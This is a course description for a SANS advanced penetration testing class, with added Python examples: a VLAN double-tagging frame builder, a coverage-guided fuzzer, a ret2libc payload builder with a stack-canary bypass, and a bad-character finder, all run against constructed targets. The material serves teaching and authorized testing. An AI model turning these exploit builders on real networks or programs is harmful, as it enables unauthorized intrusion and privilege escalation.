SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking

SEC660 is an excellent course for professionals seeking a strong technical introduction to exploit development.

Jenn Allen, Twinstate

SEC660 has the most comprehensive coverage of fuzzing--I would have signed up for the course for that alone.

Adam Kliarsky, Cedars-Sinai Medical Center

SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking is designed as a logical progression point for those who have completed SANS SEC560: Network Penetration Testing and Ethical Hacking, or for those with existing penetration testing experience. Students with the prerequisite knowledge to take this course will walk through dozens of real-world attacks used by the most seasoned penetration testers. The methodology of a given attack is discussed, followed by exercises in a real-world lab environment to solidify advanced concepts and allow for the immediate application of techniques in the workplace. Each day includes a two-hour evening bootcamp to allow for additional mastery of the techniques discussed and even more hands-on exercises. Topics covered include weaponizing Python for penetration testers, attacks against network access control (NAC) and VLAN manipulation, network device exploitation, breaking out of Linux and Windows restricted environments, IPv6, Linux privilege escalation and exploit-writing, testing cryptographic implementations, fuzzing, defeating modern OS controls such as ASLR and DEP, Return Oriented Programming (ROP), Windows exploit-writing, and much more!

It is well-known that attackers are becoming cleverer and their attacks more complex. In order to keep up with the latest attack methods, one must have a strong desire to learn, the support of others, and the opportunity to practice and build experience. SANS SEC660: Advanced Penetration Testing, Exploits, and Ethical Hacking engages attendees with in-depth knowledge of the most prominent and powerful attack vectors and an environment to perform these attacks in numerous hands-on scenarios. This course goes far beyond simple scanning for low-hanging fruit, and shows penetration testers how to model the abilities of an advanced attacker to find significant flaws in a target environment and demonstrate the business risk associated with these flaws.

SEC660 starts off by introducing advanced penetration concepts and an overview to help prepare students for what lies ahead. The focus of day one is on network attacks, an area often left untouched by testers. Topics include accessing, manipulating, and exploiting the network. Attacks are performed against NAC, VLANs, OSPF, 802.1X, CDP, IPv6, VoIP, SSL, ARP, SNMP, and others. Day two starts off with a technical module on performing penetration testing against various cryptographic implementations. The rest of the day is spent on network booting attacks, escaping Linux restricted environments such as chroot, and escaping Windows restricted desktop environments. Day three jumps into an introduction of Python for penetration testing, Scapy for packet crafting, product security testing, network and application fuzzing, and code coverage techniques. Days four and five are spent exploiting programs on the Linux and Windows operating systems. You will learn to identify privileged programs, redirect the execution of code, reverse-engineer programs to locate vulnerable code, obtain code execution for administrative shell access, and defeat modern operating system controls such as ASLR, canaries, and DEP using Return Oriented Programming (ROP) and other techniques. Local and remote exploits, as well as client-side exploitation techniques, are covered. The final course day is dedicated to numerous penetration testing challenges requiring you to solve complex problems and capture flags.

Course Syllabus

SEC660.1: Network Attacks for Penetration Testers

Overview

Day one serves as an advanced network attack module, building on knowledge gained from SEC560: Network Penetration Testing and Ethical Hacking. The focus for day one is on obtaining access to the network; manipulating the network to gain an attack position for eavesdropping and attacks, and for exploiting network devices; leveraging weaknesses in network infrastructure; and taking advantage of client frailty.

The first part of day one focuses on exploiting and bypassing network access control (NAC) as well as techniques for exploiting common weaknesses in IEEE 802.1X authentication and the Extensible Authentication Protocol (EAP). We also examine multiple techniques for VLAN manipulation and VLAN hopping attacks, with multiple lab exercises to reinforce these topics. The section concludes with IPv6 for penetration testers.
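As an added illustration of the double-tagging form of VLAN hopping (this is example code written for this page, not SEC660 courseware), the frame builder below packs two 802.1Q headers with the standard library only, and a small model of a trunk port's egress shows why the trick works: frames belonging to the trunk's native VLAN are sent untagged, so the switch strips the outer tag and the inner tag carries the frame into the target VLAN. The MAC addresses, VLAN IDs and payload are constructed, and the trunk model is a simplification of switch behaviour, not a reimplementation of any vendor's forwarding logic.

```python
import struct

ETH_P_8021Q = 0x8100   # 802.1Q tag protocol identifier
ETH_P_IP = 0x0800


def mac(text: str) -> bytes:
    """'00:11:22:33:44:55' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def tag(vid: int, pcp: int = 0) -> bytes:
    """One 802.1Q tag: TPID 0x8100, then TCI = PCP(3 bits) | DEI(1 bit) | VID(12 bits)."""
    if not 0 <= vid < 4096:
        raise ValueError("VID must fit in 12 bits")
    return struct.pack("!HH", ETH_P_8021Q, (pcp << 13) | vid)


def build_double_tagged(dst, src, native_vid, target_vid, payload, ethertype=ETH_P_IP):
    """Outer tag = the trunk's native VLAN (stripped on egress), inner tag = VLAN we want to reach."""
    return mac(dst) + mac(src) + tag(native_vid) + tag(target_vid) + struct.pack("!H", ethertype) + payload


def parse_frame(frame: bytes) -> dict:
    """Walk the tag stack after the two MAC addresses; return VIDs in order plus the final EtherType."""
    vids, off = [], 12
    while struct.unpack_from("!H", frame, off)[0] == ETH_P_8021Q:
        tci = struct.unpack_from("!H", frame, off + 2)[0]
        vids.append(tci & 0x0FFF)
        off += 4
    ethertype = struct.unpack_from("!H", frame, off)[0]
    return {"dst": frame[:6], "src": frame[6:12], "vids": vids,
            "ethertype": ethertype, "payload": frame[off + 2:]}


def trunk_egress(frame: bytes, native_vid: int) -> bytes:
    """Constructed model of a trunk port sending the frame on: traffic in the native VLAN
    goes out untagged, so a leading tag equal to native_vid is removed. Any other tag stays."""
    parsed = parse_frame(frame)
    if parsed["vids"] and parsed["vids"][0] == native_vid:
        return frame[:12] + frame[16:]      # drop the 4-byte outer tag
    return frame


if __name__ == "__main__":
    # Constructed values: attacker in VLAN 1 (the native VLAN), victim VLAN 10, dummy IPv4 payload.
    frame = build_double_tagged("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", 1, 10, b"\x45" + bytes(19))
    print("as sent  :", parse_frame(frame)["vids"])                 # [1, 10]
    print("after hop:", parse_frame(trunk_egress(frame, 1))["vids"])  # [10]
    print("wrong native VLAN:", parse_frame(trunk_egress(frame, 2))["vids"])  # [1, 10], no hop
```

In Scapy, which the course uses, the same frame is Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=10)/IP()/... The caveats a tester needs are visible in the last line of the demo: the hop only works when the attacker's access port sits in the trunk's native VLAN, and it is one-way, since the target VLAN has no path back to the attacker.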

We continue by examining techniques for manipulating networks, taking advantage of man-in-the-middle attack opportunities against multiple protocols such as ARP, HSRP, and VRRP, and against interior routing protocols, including OSPF. We also discuss custom network protocol manipulation and demonstrate how to modify the behavior of common protocols to an attacker's advantage using various tools and lab exercises.

Once we've examined techniques to gain access to and manipulate the network, we look at network exploit techniques. We examine practical attacks against common network protocols, such as SNMP, with a focus on Cisco SNMP attacks as well as attacks against client systems and software updates. We also look at techniques to bypass strong security controls achieved through encryption technologies, such as SSL.

Overview

Day two starts by taking a tactical look at techniques penetration testers can use to investigate and exploit common cryptography mistakes. We begin by building some fundamental knowledge on how ciphers operate without getting bogged down in complex mathematics, and then we move on to techniques for identifying, assessing, and attacking real-world crypto implementations. We finish the module with lab exercises that allow you to practice your newfound crypto attack skill set against reproduced real-world application vulnerabilities.

The day continues with advanced techniques but focuses more on attacking hosts by abusing environment features. We manipulate the pre-boot environment to deliver a bootable payload to the host; the booting exercise demonstrates stealing drive contents remotely.

We continue leveraging situational context to escape restricted environments. First we build up knowledge of local restrictions on hosts. Once we establish a set of possible restrictions, we leverage that knowledge to circumvent them. We escape a typical situation: a Linux chroot environment isolating a vulnerable application from the rest of the host. Using these skills, we gain a better foothold from which to continue the attack.

Then we take on restricted desktops in Windows. We will cover the core components that restrict the desktop and a variety of escape possibilities. The Windows escape exercise is a perfect, real-world demonstration of the risks of relying on obfuscation and blacklisting to thwart attacks.

The day ends with a challenging boot camp exercise against a full network environment comprised of a variety of modern, representative, and fully patched systems with no weak passwords to be found anywhere.

CPE/CMU Credits: 8

SEC660.3: Python, Scapy, and Fuzzing

Overview

Day three brings together multiple skill sets needed for creative analysis in penetration testing. We start with discussing product security testing. The day continues with a focus on how to leverage Python as a penetration tester. It is designed to help people unfamiliar with Python start modifying scripts to add their own functionality while helping seasoned Python scripters improve their skills. Once we leverage the Python skills in creative lab exercises, we move on to leveraging Scapy for custom network targeting and protocol manipulation. Using Scapy, we examine techniques for transmitting and receiving network traffic beyond what canned tools can accomplish, including IPv6.

We continue by discussing the techniques and philosophy used for penetration testing against products, including proprietary applications and commercial software. The focus throughout the course is on how advanced penetration testing techniques and exploitation can be used to perform comprehensive assessments that go far beyond typical penetration tests. Next, we take a look at network protocol and file format fuzzing. We leverage fuzzing to target both common network protocols and popular file formats for bug discovery. In class we develop custom protocol fuzzing grammars to discover bugs in popular software with hands-on lab exercises. Finally, we carefully discuss the concept of code coverage and how it ties hand in hand with fuzzing. A lab is performed using the PaiMei reverse engineering framework and IDA Pro to demonstrate the techniques discussed.
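To make the link between fuzzing and code coverage concrete, here is an added example (not from the course, which uses Sulley, Taof and PaiMei for this work) of a coverage-guided mutation fuzzer in plain Python. The target parser, its wire format and its two planted bugs are constructed for this page; coverage is collected with sys.settrace rather than a block-level tracer such as PaiMei, but the feedback loop is the same: an input that reaches new code is kept and mutated further, and a crash that sits behind a branch the seed never took is found only because the intermediate input was saved.

```python
import random
import sys

INTERESTING = (0x00, 0x01, 0x7F, 0x80, 0xFF)   # boundary values tried at every position
MAGIC = b"SX"


def parse_message(data: bytes) -> dict:
    """Constructed target with two planted bugs, standing in for a real network service.
    Wire format: b"SX" | type(1) | length(1) | body(length bytes)."""
    if len(data) < 4:
        raise ValueError("short header")
    if data[:2] != MAGIC:
        raise ValueError("bad magic")
    mtype, length = data[2], data[3]
    body = data[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated body")
    if mtype == 0x01:                          # echo: body returned as-is
        return {"type": "echo", "body": body}
    if mtype & 0x80:                           # chunked: body[0] is the chunk count
        count = body[0]                        # bug 1: IndexError when length == 0
        size = (length - 1) // count           # bug 2: ZeroDivisionError when count == 0
        chunks = [body[1 + i * size:1 + (i + 1) * size] for i in range(count)]
        return {"type": "chunked", "chunks": chunks}
    raise ValueError("unknown type")


def run_with_coverage(target, data):
    """Run target(data) under sys.settrace, recording every (function, line) executed.
    ValueError is the target's own input validation; any other exception is a crash."""
    covered = set()

    def tracer(frame, event, arg):
        if event == "line":
            covered.add((frame.f_code.co_name, frame.f_lineno))
        return tracer

    sys.settrace(tracer)
    try:
        target(data)
        return covered, None
    except ValueError:
        return covered, None
    except Exception as exc:
        return covered, exc
    finally:
        sys.settrace(None)


def havoc(rng, data: bytes) -> bytes:
    """One random mutation: bit flip, byte overwrite, insert, delete or truncate."""
    b = bytearray(data)
    op = rng.randrange(5)
    if op == 0 and b:
        b[rng.randrange(len(b))] ^= 1 << rng.randrange(8)
    elif op == 1 and b:
        b[rng.randrange(len(b))] = rng.randrange(256)
    elif op == 2:
        b.insert(rng.randrange(len(b) + 1), rng.randrange(256))
    elif op == 3 and len(b) > 1:
        del b[rng.randrange(len(b))]
    elif op == 4 and len(b) > 1:
        del b[rng.randrange(1, len(b)):]
    return bytes(b)


def fuzz(target, seeds, budget=2000, seed=0):
    """Coverage-guided fuzzing: inputs reaching new lines join the queue and are mutated further;
    crashes are deduplicated by exception class. Returns (crashes, lines_covered)."""
    rng = random.Random(seed)
    total_cov, queue, crashes, seen = set(), [], [], set()
    execs = 0

    def execute(data):
        nonlocal execs
        execs += 1
        covered, err = run_with_coverage(target, data)
        if err is not None:
            name = type(err).__name__
            if name not in seen:
                seen.add(name)
                crashes.append({"input": data, "error": name})
        elif covered - total_cov:              # new coverage: keep this input as a base
            total_cov.update(covered)
            queue.append(data)

    for s in seeds:
        execute(s)
    i = 0                                      # deterministic stage: interesting values everywhere
    while i < len(queue) and execs < budget:
        base = queue[i]
        i += 1
        for pos in range(len(base)):
            for v in INTERESTING:
                if execs < budget:
                    m = bytearray(base)
                    m[pos] = v
                    execute(bytes(m))
    while execs < budget and queue:            # havoc stage: stacked random mutations
        data = rng.choice(queue)
        for _ in range(rng.randrange(1, 4)):
            data = havoc(rng, data)
        execute(data)
    return crashes, total_cov


if __name__ == "__main__":
    found, cov = fuzz(parse_message, [b"SX\x01\x05hello"], budget=2000, seed=7)
    print(f"{len(cov)} lines covered, {len(found)} unique crashes")
    for c in found:
        print(c["error"], c["input"])
```

The seed only ever exercises the echo path. The deterministic stage sets the type byte to 0x80, which reaches the chunked branch without crashing; that input is saved because it covered new lines, and mutating it in turn exposes both planted bugs. Without the coverage feedback the fuzzer would have to hit two specific bytes in one mutation.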

CPE/CMU Credits: 8

Topics

Becoming familiar with Python types

Leveraging Python modules for real-world pen tester tasks

Manipulating stateful protocols with Scapy

Using Scapy to create a custom wireless data leakage tool

Product security testing

Using Taof for quick protocol mutation fuzzing

Optimizing your fuzzing time with smart target selection

Automating target monitoring while fuzzing with Sulley

Leveraging Microsoft Word macros for fuzzing .docx files

Block-based code coverage techniques using Paimei

SEC660.4: Exploiting Linux for Penetration Testers

Overview

Day four begins by walking through memory from an exploitation perspective and introducing x86 assembly, linking, and loading. These topics are important for anyone performing penetration testing at an advanced level: processor registers are directly manipulated by testers and must be intimately understood, and disassembly is a critical piece of testing that is used throughout the remainder of the course. We then look at the Linux OS from an exploitation perspective and discuss privilege escalation, describing how to look for SUID programs and other likely points of vulnerability and misconfiguration. The material focuses on techniques that are critical to performing penetration testing on Linux applications.

The next section goes heavily into stack overflows on Linux to gain privilege escalation and code execution. We first cover using a debugger to expose weak passwords, then move on to redirecting program execution and, finally, to code execution. Techniques such as return-to-buffer and return-to-libc are covered, along with an introduction to Return Oriented Programming (ROP). The remainder of the day takes students through techniques used to defeat or bypass OS protections such as stack canaries and address space layout randomization (ASLR). The goal of this section is to expose students to common obstacles on modern Linux-based systems.
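An added worked example for this section (example code written for this page, not the course's lab material): the cyclic-pattern trick for finding the distance from the start of the buffer to the saved return address, a classic 32-bit x86 ret2libc payload, and what happens to the same overflow when the frame is protected by a stack canary. The vulnerable frame is a constructed model of the stack rather than a real binary, and the libc addresses and the "leaked" canary value are hypothetical.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). Every 4-byte window is unique, so the
    bytes that land in EIP tell us exactly where EIP sits relative to our buffer."""
    out = bytearray()
    for u in UPPER:
        for lo in LOWER:
            for d in DIGIT:
                out += (u + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip: int, length: int = 20280) -> int:
    """Offset of the bytes now in EIP. x86 is little-endian, so the register value is reversed
    back into memory order before searching the pattern."""
    return pattern_create(length).find(eip.to_bytes(4, "little"))


def simulate_frame(payload: bytes, buf_size: int = 64, canary=None) -> int:
    """Constructed model of a 32-bit frame overflowed by an unbounded copy (e.g. read() with an
    oversized length): [buf][canary, if enabled][saved ebp][saved eip]. Returns what 'ret' would
    pop into EIP, or raises the way __stack_chk_fail() does when the canary was clobbered."""
    layout = [bytes(buf_size)]
    if canary is not None:
        layout.append(struct.pack("<I", canary))
    layout += [bytes(4), bytes(4)]
    frame = bytearray(b"".join(layout))
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]                     # the copy runs past buf into the saved state
    off = buf_size
    if canary is not None:
        if struct.unpack_from("<I", frame, off)[0] != canary:
            raise RuntimeError("*** stack smashing detected ***")
        off += 4
    off += 4                                    # saved ebp; irrelevant for ret2libc
    return struct.unpack_from("<I", frame, off)[0]


def find_eip_offset(buf_size: int = 64, canary=None) -> int:
    """Crash the target with a cyclic pattern and map the EIP value back to an offset."""
    return pattern_offset(simulate_frame(pattern_create(200), buf_size, canary))


def build_ret2libc(offset, system_addr, exit_addr, binsh_addr, canary=None, buf_size=64) -> bytes:
    """x86 ret2libc frame: EIP -> system(); system()'s return address -> exit();
    first argument -> "/bin/sh". With a leaked canary, put it back where the check expects it."""
    filler = bytearray(b"A" * offset)
    if canary is not None:
        filler[buf_size:buf_size + 4] = struct.pack("<I", canary)
    return bytes(filler) + struct.pack("<III", system_addr, exit_addr, binsh_addr)


def canary_blocks_blind_overflow(canary) -> bool:
    """True if the plain cyclic-pattern overflow is stopped by the canary check."""
    try:
        find_eip_offset(canary=canary)
        return False
    except RuntimeError:
        return True


# Hypothetical libc addresses for a non-ASLR 32-bit process (not values from any real system).
SYSTEM, EXIT, BINSH = 0xF7E1F5B0, 0xF7E12F90, 0xF7F6A0CF
# Constructed canary, pretending an info leak disclosed it. The low byte is zero, as in glibc,
# which is exactly what stops string-copy overflows from rewriting it; this model copies lengths.
LEAKED_CANARY = 0x2F9C4E00

if __name__ == "__main__":
    off = find_eip_offset()
    print("EIP offset without canary:", off)                                   # 68
    print("EIP ->", hex(simulate_frame(build_ret2libc(off, SYSTEM, EXIT, BINSH))))
    print("blind overflow stopped by canary:", canary_blocks_blind_overflow(LEAKED_CANARY))
    p = build_ret2libc(72, SYSTEM, EXIT, BINSH, canary=LEAKED_CANARY)
    print("EIP with leaked canary ->", hex(simulate_frame(p, canary=LEAKED_CANARY)))
```

The three-slot tail (system, exit, "/bin/sh") is the cdecl calling convention seen from system()'s point of view: on entry it expects its return address on top of the stack and its argument just above it. The canary run shows why the day's topic list pairs "memory leaks" with canary bypass: once the value is known, the same payload simply rewrites it in place.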

CPE/CMU Credits: 8

Topics

Stack and dynamic memory management and allocation on the Linux OS

Disassembling a binary and analyzing x86 assembly code

Performing symbol resolution on the Linux OS

Identifying vulnerable programs

Code execution redirection and memory leaks

Identifying and analyzing stack-based overflows on the Linux OS

Performing return-to-libc (ret2libc) attacks on the stack

Return Oriented Programming (ROP)

Defeating stack protection on the Linux OS

Defeating ASLR on the Linux OS

SEC660.5: Exploiting Windows for Penetration Testers

Overview

On day five we start by covering the OS security features (ASLR, DEP, etc.) added to the Windows OS over the years, as well as Windows-specific constructs such as the process environment block (PEB), structured exception handling (SEH), the thread information block (TIB), and the Windows API. Differences between Linux and Windows are covered. These topics are critical in assessing Windows-based applications. We then focus on stack-based attacks against programs running on the Windows OS. We look at the fuzzing skills required to test remote services such as TFTP and FTP for faults. Once a fault is discovered, the student will work with Immunity Debugger to turn the fault into an opportunity for code execution and privilege escalation, and will learn how to port the resulting exploit into the Metasploit Framework as a module, including how to quickly identify bad characters, both in shellcode and in input to the program. Advanced stack-based attacks, such as disabling data execution prevention (DEP) and heap spraying for browser-based applications, are covered. Client-side exploitation is introduced, as it is a highly common area of attack. Return Oriented Programming (ROP) continues from day four and is demonstrated against a vulnerable application while defeating hardware DEP and ASLR on Windows. An introduction to Windows heap overflows rounds out the day. Finally, we take a quick look at shellcode and the differences between shellcode on Linux and Windows.
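As an added example of the bad-character check mentioned above (written for this page; the course does this with Immunity Debugger and the tester's own scripts), the loop below sends every byte value, compares it with what the target kept, and excludes one mangled byte per round until the buffer arrives intact. The deliver function standing in for the target is constructed; against a real service you would replace it with code that sends the buffer and reads the copy back out of the debugger.

```python
def candidate_bytes(excluded) -> bytes:
    """Every byte value except those already known to be bad."""
    return bytes(b for b in range(256) if b not in excluded)


def first_mismatch(sent: bytes, seen: bytes):
    """Index of the first byte that differs between what we sent and what the target kept.
    A copy shorter than what we sent counts as a mismatch at the truncation point."""
    for i, (a, b) in enumerate(zip(sent, seen)):
        if a != b:
            return i
    return None if len(seen) >= len(sent) else len(seen)


def find_bad_chars(deliver, max_rounds: int = 256) -> list:
    """One round per bad byte: send all candidates, find the first byte that was dropped or
    translated, exclude it and go again, until the buffer comes back unchanged."""
    bad = set()
    for _ in range(max_rounds):
        sent = candidate_bytes(bad)
        idx = first_mismatch(sent, deliver(sent))
        if idx is None:
            return sorted(bad)
        bad.add(sent[idx])
    raise RuntimeError("byte set never stabilised")


def check_shellcode(shellcode: bytes, bad) -> list:
    """Offsets in shellcode that contain a bad byte; anything listed here needs an encoder."""
    banned = set(bad)
    return [i for i, b in enumerate(shellcode) if b in banned]


def constructed_target(data: bytes) -> bytes:
    """Stand-in for the vulnerable service: a C string copy stops at the first NUL, and a
    line-oriented protocol parser strips CR and LF before the copy happens."""
    return data.split(b"\x00", 1)[0].replace(b"\r", b"").replace(b"\n", b"")


if __name__ == "__main__":
    bad = find_bad_chars(constructed_target)
    print("bad chars:", [hex(b) for b in bad])                        # ['0x0', '0xa', '0xd']
    # Constructed 4-byte stub, not real shellcode: only the 0x0a at offset 2 needs encoding.
    print("offsets to fix:", check_shellcode(b"\x31\xc0\x0a\x90", bad))  # [2]
```

Excluding only the first mismatch per round matters: once a byte is dropped, every later byte is shifted and would otherwise be reported as bad too. A byte that is translated rather than dropped (0x0a becoming 0x0d, say) is caught the same way, since the comparison is positional.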

CPE/CMU Credits: 8

Topics

The state of Windows OS protections on XP, Vista, 7, Server 2003 and 2008

Understanding common Windows constructs

Stack exploitation on Windows

Defeating OS protections added to Windows

Dynamic and static fuzzing on Windows applications or processes

Creating a Metasploit Module

Advanced stack-smashing on Windows

Return Oriented Programming (ROP)

Windows 7 and Windows 8

Porting Metasploit Modules

Client-side exploitation

Windows and Linux shellcode

SEC660.6: Capture the Flag

Overview

This day will serve as a real-world challenge for students, requiring them to utilize skills obtained throughout the course, think outside the box, and solve simple to complex problems. A web server scoring system and CTF engine will be provided to score students as they capture flags. More difficult challenges will be worth more points. In this offensive exercise, challenges range from local privilege escalation to remote exploitation on both Linux and Windows systems as well as networking attacks and other challenges related to the course material.

CPE/CMU Credits: 6

Additional Information

Laptop Required

You will use VMware to run multiple operating systems when performing class exercises. Linux VMs with all necessary tools will be provided on a DVD on the first day.

You must bring your own Virtual Machine image of Windows XP SP2 or XP SP3. This must be a base install with no updates applied. Windows 7 is also recommended, but not required.

Tools needed for Windows will be issued in class. Ensure that you have the administrative ability to disable all security software and protection, including antivirus and personal firewalls. You will not be able to complete the exercises without this level of control. Also ensure that you can install software that may be blocked by administrative or security controls due to its nature. You will be installing various debuggers and vulnerable applications onto the VMs.

You must have VMware Workstation installed on your system prior to class beginning. You need to use at least VMware Workstation version 6 to support the VMs that will be distributed in class. If you do not own a licensed copy of VMware, you can download a free 30-day trial copy from www.vmware.com. VMware will send you a time-limited serial number if you register for the trial at their website. You may also use VMware Player; however, there are limitations, such as the inability to take snapshots. If you choose to use VMware Player, you must use at least version 2.5.1.

Attention Mac Users: VMware Fusion will work with the majority of the exercises for SEC660 on Mac OS X; however, there is the potential for serious issues with networking over bridged connections, which could prevent you from completing some of the labs. VirtualBox, version 4.2.4 or later, is recommended as the optimal way to complete the exercises on Mac OS X. You must be running OS X 10.6 "Snow Leopard" or newer. If you elect to stay with Fusion, be prepared for more difficulty in lab setup than with VMware Workstation on a PC. You will need to map function keys such as F7 and F9 through any virtualization application on OS X in order to perform debugging. It is strongly recommended that you bring a USB Ethernet LAN adapter, since you will not be able to natively boot your Mac into BackTrack. Verify that you can use the external adapter with your Mac while BackTrack is running in a virtual machine.

Verify that your processor architecture supports your VMware version. Do not wait until the day of class.

If you have additional questions about the laptop specifications, please contact laptop_prep@sans.org.

Who Should Attend

Network and Systems Penetration Testers - SEC660 gives penetration testers the training needed to perform advanced penetration testing against known or unknown applications, services, and network systems. SEC660 gives students the expertise to perform complex attacks and develop their own exploits for existing and new frameworks.

Incident Handlers - SEC660 gives incident handlers the knowledge needed to understand advanced threats. Often, a handler is tasked with determining the threat level associated with an attack. The ability to understand advanced attack techniques and analyze exploit code can help a handler identify, detect, and respond to an incident.

Application Developers - SEC660 teaches developers the ramifications of poor coding. Often, a developer or code reviewer is required to clearly demonstrate the threat and impact of a coding error. SEC660 provides developers with the knowledge to create proof-of-concept exploit code and document their findings.

IDS Engineers - SEC660 teaches IDS professionals how to analyze exploit code and identify weaknesses. This knowledge can be used to write better IDS signatures and understand the impact of an alert.

Prerequisites

This is a fast-paced, advanced course that requires a strong desire to learn advanced penetration testing and custom exploitation techniques. SANS courses such as SEC504: Hacker Techniques, Exploits, and Incident Handling, SEC560: Network Penetration Testing and Ethical Hacking, and SEC610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques are recommended prior to or as a companion to taking this course. Experience with programming in any language is highly recommended. At a minimum, students are advised to read up on basic programming concepts. Python is the primary language used during class exercises, while C and C++ programs are the primary targets being reversed and exploited. The basics of programming will not be covered in this course; however, there is an introductory module on Python. You should be well versed in the fundamentals of penetration testing prior to taking this course. Familiarity with Linux and Windows is mandatory. A solid understanding of TCP/IP and networking concepts is required. Please contact the author at stephen@deadlisting.com if you have any questions or concerns about the prerequisites.

Model the techniques used by attackers to perform 0-day vulnerability discovery and exploit development

Develop more accurate quantitative and qualitative risk assessments through validation

Demonstrate the needs and effects of leveraging modern exploit mitigation controls

Reverse engineer vulnerable code to write custom exploits

Great preparation for students planning on taking the following courses:

SEC710 Advanced Exploit Development

Author Statement

As a perpetual student of information security, I am excited to offer this course on advanced penetration testing. Often, when conducting an in-depth penetration test, we are faced with situations that require unique or complex solutions to successfully pull off an attack, mimicking the activities of increasingly sophisticated real-world attackers. Without the skills to do so, you may miss a major vulnerability or not properly assess its business impact. Target system personnel are relying on you to tell them whether or not an environment is secured. Attackers are almost always one step ahead and are relying on our nature to become complacent with controls we work so hard to deploy. This course was written to keep you from making mistakes others have made, teach you cutting edge tricks to thoroughly evaluate a target, and provide you with the skills to jump into exploit development. Contact me at stephen@deadlisting.com if you have any questions about the course!